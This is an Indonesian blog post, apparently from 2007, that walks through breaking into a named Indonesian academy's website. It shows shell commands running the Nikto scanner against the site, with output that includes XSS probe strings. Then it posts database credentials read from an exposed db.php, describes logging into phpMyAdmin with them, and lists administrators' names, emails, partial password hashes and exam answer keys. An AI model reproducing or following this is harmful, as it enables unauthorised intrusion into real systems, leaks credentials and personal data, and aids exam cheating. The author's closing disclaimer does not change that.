By cyberlog
Published: April 25, 2007
Print
Email
Akademi Bina Sarana
Informatika merupakan salah satu Akademi terbesar di Indonesia
dengan kampus yang tersebar di berbagai daerah, mereka
menggunakan sistem online didalam segala hal untuk mempermudah sistem
pendidikannya dari mulai absen dosen , cetak kartu hasil studi , sampai
status pembayaran mahasiswa dan data-data lengkap puluhan ribu
mahasiswanya , semua bisa dilihat didalam web ini . disini penulis mecoba menganalisa sistem Online yang diterapkan pada situs www.bsi.ac.id dengan melakukan scanning server mereka menggunakan Nikto.pl ============================================= Vulnerable : Db.php Type : High Risk Original Idea : Crew #sekuritionline@dalnet ( anonymous ) Site : http://www.bsi.ac.id ============================================= Ok untuk mempersingkat waktu mari kita mulai mencoba menjelajah situs www.bsi.ac.id ini !!!! Hal
pertama yang perlu dilakukan adalah siapkan satu shell account anda ,
lalu loginlah kedalam shell acount anda lalu downloadlah nikto.pl pada
url berikut ini http://cirt.net/nikto/nikto-current.tar.gz berikut ini adalah cara detailnya menjelajahi situs www.bsi.ac.id : ============== login as: root root@bla-bla-bla.com's password: Last login: Mon 2006 Last login: Mon 01:09:20 welcome:~# wget http://cirt.net/nikto/nikto-current.tar.gz --01:19:06-- http://cirt.net/nikto/nikto-current.tar.gz => `nikto-current.tar.gz' Resolving cirt.net... done. Connecting to cirt.net[209.197.238.96]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 192,642 [application/x-tar] 100%[======================================>] 192,642 184.98K/s ETA 00:00 01:19:08 (184.98 KB/s) - `nikto-current.tar.gz' saved [192642/192642] welcome:~# tar -xvzf nikto-current.tar.gz nikto-1.35/ nikto-1.35/config.txt nikto-1.35/docs/ nikto-1.35/docs/CHANGES.txt nikto-1.35/docs/LICENSE.txt nikto-1.35/docs/nikto-1.34.man nikto-1.35/docs/nikto_usage.html nikto-1.35/docs/nikto_usage.txt nikto-1.35/docs/README_plugins.txt nikto-1.35/nikto.pl nikto-1.35/plugins/ nikto-1.35/plugins/LW.pm nikto-1.35/plugins/nikto_apacheusers.plugin nikto-1.35/plugins/nikto_core.plugin nikto-1.35/plugins/nikto_headers.plugin nikto-1.35/plugins/nikto_httpoptions.plugin nikto-1.35/plugins/nikto_msgs.plugin nikto-1.35/plugins/nikto_mutate.plugin nikto-1.35/plugins/nikto_outdated.plugin nikto-1.35/plugins/nikto_passfiles.plugin nikto-1.35/plugins/nikto_plugin_order.txt nikto-1.35/plugins/nikto_realms.plugin nikto-1.35/plugins/nikto_robots.plugin nikto-1.35/plugins/nikto_user_enum_apache.plugin nikto-1.35/plugins/nikto_user_enum_cgiwrap.plugin nikto-1.35/plugins/outdated.db nikto-1.35/plugins/realms.db nikto-1.35/plugins/scan_database.db nikto-1.35/plugins/server_msgs.db nikto-1.35/plugins/servers.db nikto-1.35/versions.txt welcome:~# cd /root/nikto-1.35 welcome:~/nikto-1.35# ./nikto.pl -update + Retrieving 'realms.db' + Retrieving 'server_msgs.db' + Retrieving 'nikto_headers.plugin' + Retrieving 'nikto_outdated.plugin' + Retrieving 'servers.db' + Retrieving 'scan_database.db' + Retrieving 'nikto_core.plugin' + Retrieving 'outdated.db' + Retrieving 'CHANGES.txt' + www.cirt.net message: Version 2.0 is still coming... Seriously. ================================================ Kemudian jalankan nikto kesayangan anda ================================================== welcome:~/nikto-1.35# ./nikto.pl -h www.bsi.ac.id --------------------------------------------------------------------------- - Nikto 1.35/1.36 - www.cirt.net + Target IP: 203.130.232.140 + Target Hostname: www.bsi.ac.id + Target Port: 80 + Start Time: Tue Dec 19 05:54:01 2006 --------------------------------------------------------------------------- - Scan is dependent on "Server" string which can be faked, use -g to override + Server: Apache 3 - POWERNET - Retrieved X-Powered-By header: PHP/4.3.9 + PHP/4.3.9 appears to be outdated (current is at least 5.1.4) +
/~root - Enumeration of users is possible by requesting ~username
(responds with Forbidden for real users, not found for non-existent
users) (GET). +
/icons/ - Directory indexing is enabled, it should only be enabled for
specific directories (if required). If indexing is not used, the /icons
directory should be removed. (GET) +
/manual/images/ - Apache 2.0 directory indexing is enabled, it should
only be enabled for specific directories (if required). Apache's manual
should be removed and directory indexing disabled. (GET) +
/ - TRACE option appears to allow XSS or credential theft. See
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for
details (TRACE) + /admin.php?en_log_id=0&action=config - Needs Auth: (realm "BSI Admin, Authenticate Please" + /admin.php?en_log_id=0&action=users - Needs Auth: (realm "BSI Admin, Authenticate Please" + /config.php - Redirects to index.php , PHP Config file may contain database IDs and passwords. +
/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 - PHP reveals
potentially sensitive information via certain HTTP requests which
contain specific QUERY strings. OSVDB-12184. (GET) +
/index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 - PHP reveals
potentially sensitive information via certain HTTP requests which
contain specific QUERY strings. OSVDB-12184. (GET) +
/index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 - PHP reveals
potentially sensitive information via certain HTTP requests which
contain specific QUERY strings. OSVDB-12184. (GET) +
/index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 - PHP reveals
potentially sensitive information via certain HTTP requests which
contain specific QUERY strings. OSVDB-12184. (GET) +
/index.php?module=My_eGallery - My_eGallery prior to 3.1.1.g are
vulnerable to a remote execution bug via SQL command injection. (GET) +
/index.php?top_message=<script>alert(document.cookie)</script>
- Led-Forums allows any user to change the welcome message, and it is
vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET) + /info.php - Contains PHP configuration information (GET) + /manual/ - Web server manual? tsk tsk. (GET) + /readme.txt - Default file found. (GET) +
/\"><img%20src=\"javascript:alert(document.domain)\"> - The
IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site
Scripting (XSS). CA-2000-02. (GET) + /admin.php - Needs Auth: (realm "BSI Admin, Authenticate Please" + /css - Redirects to http://www.bsi.ac.id/css/ , This might be interesting... + /db/ - This might be interesting... (GET) + /download/ - This might be interesting... (GET) + /img/ - This may be interesting... (GET) + /includes/ - This might be interesting... (GET) + /pages/ - This might be interesting... (GET) + /php/ - This might be interesting... (GET) + /phpmyadmin/ - This might be interesting... (GET) + /sql/ - This might be interesting... (GET) + Over 20 "OK" messages, this may be a by-product of the
+ server answering all requests with a "200 OK"
message. You should + manually verify your results. + /db.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /index.php?base=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /index.php?IDAdmin=test - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /index.php?pymembs=admin - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /index.php?SqlQuery=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /index.php?tampon=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET) +
/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20
- This might be interesting... has been seen in web logs from an
unknown scanner. (GET) + /modules/Search/index.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + Over 20 "OK" messages, this may be a by-product of the
+ server answering all requests with a "200 OK"
message. You should + manually verify your results. + 2673 items checked - 30 item(s) found on remote host(s) + End Time: Tue Dec 19 06:44:55 2006 (3054 seconds) --------------------------------------------------------------------------- + 1 host(s) tested welcome:~/nikto-1.35# ============================================================ nah tugas kita sekarang adalah mencoba satu persatu vulnerable yang ada di situs www.bsi.ac.id ini ============================================================ hehehe banyak banget yah vulnerablenya, ok yang pertama kita cek adalah www.bsi.ac.id/db.php
Gambar Tampilan Login dan Password database BSI

Waw !!! I don’t believe it ??? , ternyata login dan password databasenya terlihat sangat jelas ST", "localhost" ; define("USER", "1385" ; define("PASS", "101101" ; define("DB", "db1385n1" ; ?> Oke saatnya kita masuk ke database salah satu Akademi terbesar di Indonesia ini let`s go to the party J www.bsi.ac.id/phpmyadmin user : 1385 pass : 101101
Gambar tampilan awal database BSI

waw
ternyata kita juga bisa masuk kedalamnya , bisa lihat-lihat data
penting di Akademi ini ( bayangin klo orang-orang yang ga bertanggung
jawab atau orang yang mao mengambil keuntungan dari kelemahan ini masuk
kesana ??? ga bisa dibayangin deh betapa banyaknya data-data yang bisa
dicuri ) budiprasetyo
God
http://bsi.ac.id
budi_prasetyo@bsi.ac.id
2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ] bimosadewo
bimosadewo
www.bsi.ac.id
budi_prasetyo@indo.net.id
2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ] webmaster
Web Master BSI
www.bsi.ac.id
admin@bsi.ac.id
237efd9bbf866189be3a3055515xxxxx [ md5 hash ] webadmin
Web Administrator
www.bsi.ac.id
webmaseter@bsi.ac.id
237efd9bbf866189be3a3055515xxxxx [ md5 hash ] dan ternyata ada kunci jawab ujiannya juga didalamnya : Full
Texts kd_ujn jml_soal
nilai_soal
knc_jwb Edit Delete 1021 25 4.00 DDAEDCBBACBCBABCAABBCDCAD Edit Delete 1022 25 4.00 DBCBBBBABADDDCABAACDCBDCD Edit Delete 1023 25 4.00 BBADBBDCDAACBBBCDBBBBDBBC Edit Delete 1024 25 4.00 DDAEDCBBACDDDCABAACDBDBBC Edit Delete 1025 25 4.00 DBCBCDCCCBBCBBBBCADDDCAAD Edit Delete 1026 25 4.00 CDDADBDDBBBCCCCCADACDCCCB Edit
Delete 1041 30
3.33
BCBBBDAAAAABCDCABDDCCBACBBABDB Edit
Delete 1042 30
3.33
CBCADCCCCABACCBCDCAADCCADABABB Edit
Delete 1043 30
3.33
DDCCAACCAACACACBBCBCBACADCBABB Edit
Delete 1044 30
3.33
BCADBDBAABAABBBDBBDADBDDCBBBAD Edit
Delete 1045 30
3.33
DDCCAACCAAABCDCABDDCDBDDCBBBAD Edit
Delete 1046 30
3.33
CBCADCCCCAAABBCDBBDABACADCBABB Note : - Untuk Admin mohon diperhatikan lebih jauh tentang keamanan server and - Untuk saat ini bugs yang terdapat pada url www.bsi.ac.id/phpmyadmin telah Berhasil ditutup oleh sang admin dengan tidak mengijinkan IP lain masuk , selain IP sang admin itu sendiri - Kami
hanya melakukan penetrasi kedalam tidak merusak atau mengambil
data anda,bila ada yang mengambil atau menambahkan
database kedalam server anda bukan kami yang melakukannya. - Sampai
saat tulisan ini dibuat file yang bernama db.php masih dapat
diakses oleh khalayak umum ( untuk admin harap diperhatikan permit dari
file tersebut thank's to : Allah,Swt & Nabi Muhammad SAW , My Family, Thebig`s Family #sekuritionline@dalnet , Jasakom Community and all Crew www.sekuritionline.com
View Comments (0)
|
Sorry, your account does not have access to post comments.